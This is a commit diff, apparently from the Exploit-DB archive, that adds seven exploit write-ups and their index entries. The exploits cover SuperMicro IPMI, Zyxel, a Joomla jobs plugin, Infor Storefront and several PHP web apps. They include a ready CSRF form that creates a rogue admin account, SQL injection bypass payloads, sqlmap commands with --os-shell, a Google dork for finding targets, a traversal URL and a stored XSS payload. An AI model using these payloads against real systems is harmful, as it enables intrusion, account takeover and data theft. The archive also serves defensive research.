DB: 2020-07-16
8 changes to exploits/shellcodes SuperMicro IPMI WebInterface 03.40 - Cross-Site Request Forgery (Add Admin) Zyxel Armor X1 WAP6806 - Directory Traversal Joomla! J2 JOBS 1.3.0 - 'sortby' Authenticated SQL Injection Online Polling System 1.0 - Authentication Bypass Web Based Online Hotel Booking System 0.1.0 - Authentication Bypass Online Farm Management System 0.1.0 - Persistent Cross-Site Scripting Infor Storefront B2B 1.0 - 'usr_name' SQL Injection
This commit is contained in:
parent
87c306bdc9
commit
8bb6bd8fb0
9 changed files with 238 additions and 0 deletions
28
exploits/hardware/webapps/48668.txt
Normal file
28
exploits/hardware/webapps/48668.txt
Normal file
|
@ -0,0 +1,28 @@
|
||||||
|
# Exploit Title: SuperMicro IPMI WebInterface 03.40 - Cross-Site Request Forgery (Add Admin)
|
||||||
|
# Exploit Author: Metin Yunus Kandemir
|
||||||
|
# Date: 2020-07-15
|
||||||
|
# Vendor Homepage: https://www.supermicro.com/
|
||||||
|
# Version: X10DRH-iT motherboards with BIOS 2.0a and IPMI firmware 03.40
|
||||||
|
# CVE: CVE-2020-15046
|
||||||
|
# Source: https://www.totalpentest.com/post/supermicro-ipmi-webgui-cross-site-request-forgery
|
||||||
|
|
||||||
|
# Description:
|
||||||
|
# The web interface on Supermicro X10DRH-iT motherboards with BIOS 2.0a and IPMI firmware 03.40
|
||||||
|
# allows remote attackers to exploit a cgi/config_user.cgi CSRF issue to add new admin users.
|
||||||
|
# The fixed versions are BIOS 3.2 and firmware 03.88.
|
||||||
|
|
||||||
|
# PoC :
|
||||||
|
|
||||||
|
<html>
|
||||||
|
<!-- CSRF PoC - generated by Burp Suite Professional -->
|
||||||
|
<body>
|
||||||
|
<script>history.pushState('', '', '/')</script>
|
||||||
|
<form action="https://SuperMicro-IP/cgi/config_user.cgi" method="POST">
|
||||||
|
<input type="hidden" name="username" value="JOKER" />
|
||||||
|
<input type="hidden" name="original_username" value="2" />
|
||||||
|
<input type="hidden" name="password" value="onebadday" />
|
||||||
|
<input type="hidden" name="new_privilege" value="4" />
|
||||||
|
<input type="submit" value="submit request" />
|
||||||
|
</form>
|
||||||
|
</body>
|
||||||
|
</html>
|
21
exploits/hardware/webapps/48669.txt
Normal file
21
exploits/hardware/webapps/48669.txt
Normal file
|
@ -0,0 +1,21 @@
|
||||||
|
# Exploit Title: Zyxel Armor X1 WAP6806 - Directory Traversal
|
||||||
|
# Date: 2020-06-19
|
||||||
|
# Exploit Author: Rajivarnan R
|
||||||
|
# Vendor Homepage: https://www.zyxel.com/
|
||||||
|
# Software [http://www.zyxelguard.com/WAP6806.asp]
|
||||||
|
# Version: [V1.00(ABAL.6)C0]
|
||||||
|
# CVE: 2020-14461
|
||||||
|
# Tested on: Linux Mint / Windows 10
|
||||||
|
# Vulnerabilities Discovered Date : 2020/06/19 [YYYY/MM/DD]
|
||||||
|
|
||||||
|
# As a result of the research, one vulnerability identified.
|
||||||
|
# (Directory Traversal)
|
||||||
|
# Technical information is provided below step by step.
|
||||||
|
|
||||||
|
# [1] - Directory Traversal Vulnerability
|
||||||
|
|
||||||
|
# Vulnerable Parameter Type: GET
|
||||||
|
# Vulnerable Parameter: TARGET/Zyxel/images/eaZy/]
|
||||||
|
|
||||||
|
# Proof of Concepts:https://TARGET/Zyxel/images/eaZy/
|
||||||
|
<https://target/Zyxel/images/eaZy/>
|
|
@ -6,6 +6,7 @@
|
||||||
# Software Link:https://github.com/VictorAlagwu/CMSsite/archive/master.zip
|
# Software Link:https://github.com/VictorAlagwu/CMSsite/archive/master.zip
|
||||||
# Version: 1.0
|
# Version: 1.0
|
||||||
# Tested on: Windows 10
|
# Tested on: Windows 10
|
||||||
|
# CVE: CVE-2020-15599
|
||||||
|
|
||||||
Description: The form parameter 'user_firstname' and 'user_lastname' is vulnerable to stored cross site scripting
|
Description: The form parameter 'user_firstname' and 'user_lastname' is vulnerable to stored cross site scripting
|
||||||
|
|
||||||
|
|
36
exploits/php/webapps/48670.txt
Normal file
36
exploits/php/webapps/48670.txt
Normal file
|
@ -0,0 +1,36 @@
|
||||||
|
# Exploit Title: Joomla! J2 JOBS 1.3.0 - 'sortby' Authenticated SQL Injection
|
||||||
|
# Date: 2020-06-17
|
||||||
|
# Exploit Author: Mehmet Kelepçe / Gais Cyber Security
|
||||||
|
# Vendor Homepage: https://joomsky.com/
|
||||||
|
# Software Link: https://joomsky.com/products/js-jobs-pro.html
|
||||||
|
# Change Log (Update) : https://joomsky.com/products/js-jobs.html
|
||||||
|
# Version: 1.3.0
|
||||||
|
# Tested on: Kali Linux - Apache2
|
||||||
|
|
||||||
|
Vulnerable param: sortby
|
||||||
|
-------------------------------------------------------------------------
|
||||||
|
POST /joomla/administrator/index.php HTTP/1.1
|
||||||
|
Host: localhost
|
||||||
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Referer: http://localhost/joomla/administrator/index.php
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Content-Length: 233
|
||||||
|
Connection: close
|
||||||
|
Cookie: COOKIES
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
|
||||||
|
js_sortby=4&companyname=12&jobtitle=12&location=12&jobcategory=&jobtype=&datefrom=&dateto=&option=com_jsjobs&task=&c=job&view=job&callfrom=jobqueue&layout=jobqueue&sortby=asc&my_click=&boxchecked=0&d90ced5aa929447644f09b56c8d8ba12=1
|
||||||
|
|
||||||
|
|
||||||
|
-------------------------------------------------------------------------
|
||||||
|
sqlmap poc:
|
||||||
|
|
||||||
|
sqlmap -r jsjobs --dbs --risk=3 --level=5 --random-agent -p sortby
|
||||||
|
|
||||||
|
|
||||||
|
Mehmet KELEPÇE
|
||||||
|
|
||||||
|
Penetration Tester | Red Team
|
46
exploits/php/webapps/48671.txt
Normal file
46
exploits/php/webapps/48671.txt
Normal file
|
@ -0,0 +1,46 @@
|
||||||
|
# Exploit Title: Online Polling System 1.0 - Authentication Bypass
|
||||||
|
# Date: 2020-07-20
|
||||||
|
# Author: AppleBois
|
||||||
|
# Version: NULL
|
||||||
|
# Software Link: https://www.sourcecodester.com/php/14330/online-polling-system.html
|
||||||
|
#
|
||||||
|
# Administration Control Panel || Authentication Bypass
|
||||||
|
# Unthenticated User perform SQL Injection bypass login mechanism on /admin/checklogin.php
|
||||||
|
#
|
||||||
|
######################################################################################
|
||||||
|
#Vulnerable Code
|
||||||
|
#
|
||||||
|
#$myusername=$_POST['myusername'];
|
||||||
|
#$mypassword=$_POST['mypassword'];
|
||||||
|
#$encrypted_mypassword=md5($mypassword);
|
||||||
|
#
|
||||||
|
#$result=mysqli_query($conn, "SELECT * FROM `tbadministrators` WHERE email='$myusername' and password='$encrypted_mypassword'");
|
||||||
|
#
|
||||||
|
#$count=mysqli_num_rows($result);
|
||||||
|
#
|
||||||
|
#if($count==1){
|
||||||
|
#
|
||||||
|
#$user = mysqli_fetch_assoc($result);
|
||||||
|
#$_SESSION['member_id'] = $user['member_id'];
|
||||||
|
#header("location:student.php");
|
||||||
|
#}
|
||||||
|
#
|
||||||
|
######################################################################################
|
||||||
|
|
||||||
|
|
||||||
|
POST /admin/checklogin.php HTTP/1.1
|
||||||
|
Host: 10.10.10.2:81
|
||||||
|
Content-Length: 53
|
||||||
|
Cache-Control: max-age=0
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
Origin: http://10.10.10.2:81
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||||
|
Referer: http://10.10.10.2:81/online/index.php
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Accept-Language: en-US,en;q=0.9
|
||||||
|
Cookie: ASP.NET_SessionId=vbrb31kd3s5hmz3uobg0smck; UserSettings=language=1; dnn_IsMobile=False; .ASPXANONYMOUS=VA9hDh-1Ldg0FPbBfd9HAWSTqKjasYcZMlHQnpPaoR5WQipK7Q_kKnAlAqfWp0WgtO8HXH2_Tsrhfh-Z7137cng_MeEp3aiMPswVEPZc-UOdZQTp0; __RequestVerificationToken_L0ROTg2=Js5PUWl0BiY3kJLdEPU2oEna_UsEFTrNQiGY986uBwWdRyVDxr2ItTPSUBd07QX6rRyfXQ2; USERNAME_CHANGED=; language=en-US; authentication=DNN; .DOTNETNUKE=CC547735526446773F995D833FACDA646745AE4409516EBF345F1AC725F7D7CE7BFC420BF5EFE9FE2AEC92B04C89CCD2E64C34BA4E195D7D8D6EED7892574DB3FF02599F; ICMSSESSION=mgnp26oubn7hfc590q6j5c9o70; PHPSESSID=1gpgmmltf6uk3ju3aakgd0s8m5
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
myusername=' or 1=1#&mypassword=ad&Submit=Login
|
36
exploits/php/webapps/48672.txt
Normal file
36
exploits/php/webapps/48672.txt
Normal file
|
@ -0,0 +1,36 @@
|
||||||
|
# Exploit Title: Web Based Online Hotel Booking System 0.1.0 - Authentication Bypass
|
||||||
|
# Date: 2020-07-03
|
||||||
|
# Exploit Author: KeopssGroup0day,Inc
|
||||||
|
# Vendor Homepage: https://github.com/mrzulkarnine/Web-based-hotel-booking-system
|
||||||
|
# Software Link: https://github.com/mrzulkarnine/Web-based-hotel-
|
||||||
|
booking-system
|
||||||
|
# Version: 0.1.0
|
||||||
|
# Tested on: Kali Linux
|
||||||
|
|
||||||
|
Source code(localhost/admin/loginauth.php):
|
||||||
|
<?php
|
||||||
|
session_start();
|
||||||
|
|
||||||
|
$_SESSION['username'] = $_POST['username'];
|
||||||
|
$_SESSION['password'] = $_POST['password'];
|
||||||
|
|
||||||
|
include './auth.php';
|
||||||
|
$re = mysql_query("select * from user where
|
||||||
|
username = '".$_SESSION['username']."' AND password =
|
||||||
|
'".$_SESSION['password']."' " );
|
||||||
|
echo mysql_error();
|
||||||
|
if(mysql_num_rows($re) > 0)
|
||||||
|
{
|
||||||
|
header('Refresh: 0;url=dashboard.php');
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
|
||||||
|
session_destroy();
|
||||||
|
header("location: index.htm");
|
||||||
|
}
|
||||||
|
?>
|
||||||
|
|
||||||
|
Payload:
|
||||||
|
Username: 1' or 1 = 1 LIMIT 1#
|
||||||
|
Password: 1' or 1 = 1 LIMIT 1#
|
26
exploits/php/webapps/48673.txt
Normal file
26
exploits/php/webapps/48673.txt
Normal file
|
@ -0,0 +1,26 @@
|
||||||
|
# Exploit Title: Online Farm Management System 0.1.0 - Persistent Cross-Site Scripting
|
||||||
|
# Date: 2020-06-29
|
||||||
|
# Exploit Author: KeopssGroup0day,Inc
|
||||||
|
# Vendor Homepage: https://www.sourcecodester.com/php/14198/online-farm-management-system-phpmysql.html
|
||||||
|
# Software Link: https://www.campcodes.com/projects/php/249/farm-management-system-in-php-mysql/
|
||||||
|
# Version: 0.1.0
|
||||||
|
# Tested on: Kali Linux
|
||||||
|
|
||||||
|
Source code(review.php):
|
||||||
|
<?php
|
||||||
|
if($result) :
|
||||||
|
while($row1 = $result->fetch_array()) :
|
||||||
|
?>
|
||||||
|
<div class="con">
|
||||||
|
<div class="row">
|
||||||
|
<div class="col-sm-4">
|
||||||
|
<em style="color: black;"><?= $row1['comment']; ?></em>
|
||||||
|
</div>
|
||||||
|
|
||||||
|
|
||||||
|
POC:
|
||||||
|
|
||||||
|
1. http://192.168.1.58/a/review.php?pid=31 go
|
||||||
|
2. We send the payload (<script>alert(1)</script>)
|
||||||
|
3. Write a review payload and submit
|
||||||
|
4. And refresh the page
|
37
exploits/php/webapps/48674.txt
Normal file
37
exploits/php/webapps/48674.txt
Normal file
|
@ -0,0 +1,37 @@
|
||||||
|
# Exploit Title: Infor Storefront B2B 1.0 - 'usr_name' SQL Injection
|
||||||
|
# Google Dork: inurl:storefrontb2bweb
|
||||||
|
# Date: 2020-06-27
|
||||||
|
# Exploit Author: ratboy
|
||||||
|
# Vendor Homepage: https://www.insitesoft.com/infor-storefront/
|
||||||
|
# Version: Infor Storefront
|
||||||
|
# Tested on: Windows All Versions
|
||||||
|
|
||||||
|
[POC Multiple Vulns]
|
||||||
|
|
||||||
|
python sqlmap.py -u
|
||||||
|
"http://localhost/storefrontB2BWEB/login.do?setup_principal=true&action=prepare_forgot&login=true&usr_name=ass"
|
||||||
|
-p usr_name --dbms=mssql --level=5 --risk=3
|
||||||
|
--tamper=between,space2comment -o --random-agent --parse-errors
|
||||||
|
--os-shell --technique=ES
|
||||||
|
|
||||||
|
|
||||||
|
python sqlmap.py -u
|
||||||
|
"http://localhost/storefrontB2CWEB/cart.do?action=cart_add&itm_id=1"
|
||||||
|
-p itm_id --dbms=mssql --level=5 --risk=3
|
||||||
|
--tamper=between,space2comment -o --random-agent --parse-errors
|
||||||
|
--os-shell --technique=ES
|
||||||
|
|
||||||
|
|
||||||
|
or...
|
||||||
|
|
||||||
|
http://localhost/storefrontB2BWEB/login.do?setup_principal=true&action=prepare_forgot&login=true&usr_name=ass'[SQL
|
||||||
|
INJECTION];--
|
||||||
|
|
||||||
|
http://localhost/storefrontB2CWEB/cart.do?action=cart_add&itm_id=1'[SQL
|
||||||
|
INJECTION];--
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
--
|
||||||
|
Sincerly,
|
||||||
|
Aaron Schrom
|
|
@ -42915,3 +42915,10 @@ id,file,description,date,author,type,platform,port
|
||||||
48663,exploits/php/webapps/48663.txt,"Park Ticketing Management System 1.0 - Authentication Bypass",2020-07-13,gh1mau,webapps,php,
|
48663,exploits/php/webapps/48663.txt,"Park Ticketing Management System 1.0 - Authentication Bypass",2020-07-13,gh1mau,webapps,php,
|
||||||
48666,exploits/multiple/webapps/48666.txt,"BSA Radar 1.6.7234.24750 - Local File Inclusion",2020-07-14,"William Summerhill",webapps,multiple,
|
48666,exploits/multiple/webapps/48666.txt,"BSA Radar 1.6.7234.24750 - Local File Inclusion",2020-07-14,"William Summerhill",webapps,multiple,
|
||||||
48667,exploits/multiple/webapps/48667.rb,"Trend Micro Web Security Virtual Appliance 6.5 SP2 Patch 4 Build 1901 - Remote Code Execution (Metasploit)",2020-07-14,"Mehmet Ince",webapps,multiple,
|
48667,exploits/multiple/webapps/48667.rb,"Trend Micro Web Security Virtual Appliance 6.5 SP2 Patch 4 Build 1901 - Remote Code Execution (Metasploit)",2020-07-14,"Mehmet Ince",webapps,multiple,
|
||||||
|
48668,exploits/hardware/webapps/48668.txt,"SuperMicro IPMI WebInterface 03.40 - Cross-Site Request Forgery (Add Admin)",2020-07-15,"Metin Yunus Kandemir",webapps,hardware,
|
||||||
|
48669,exploits/hardware/webapps/48669.txt,"Zyxel Armor X1 WAP6806 - Directory Traversal",2020-07-15,"Rajivarnan R",webapps,hardware,
|
||||||
|
48670,exploits/php/webapps/48670.txt,"Joomla! J2 JOBS 1.3.0 - 'sortby' Authenticated SQL Injection",2020-07-15,"Mehmet Kelepçe",webapps,php,
|
||||||
|
48671,exploits/php/webapps/48671.txt,"Online Polling System 1.0 - Authentication Bypass",2020-07-15,AppleBois,webapps,php,
|
||||||
|
48672,exploits/php/webapps/48672.txt,"Web Based Online Hotel Booking System 0.1.0 - Authentication Bypass",2020-07-15,KeopssGroup0day_Inc,webapps,php,
|
||||||
|
48673,exploits/php/webapps/48673.txt,"Online Farm Management System 0.1.0 - Persistent Cross-Site Scripting",2020-07-15,KeopssGroup0day_Inc,webapps,php,
|
||||||
|
48674,exploits/php/webapps/48674.txt,"Infor Storefront B2B 1.0 - 'usr_name' SQL Injection",2020-07-15,ratboy,webapps,php,
|
||||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue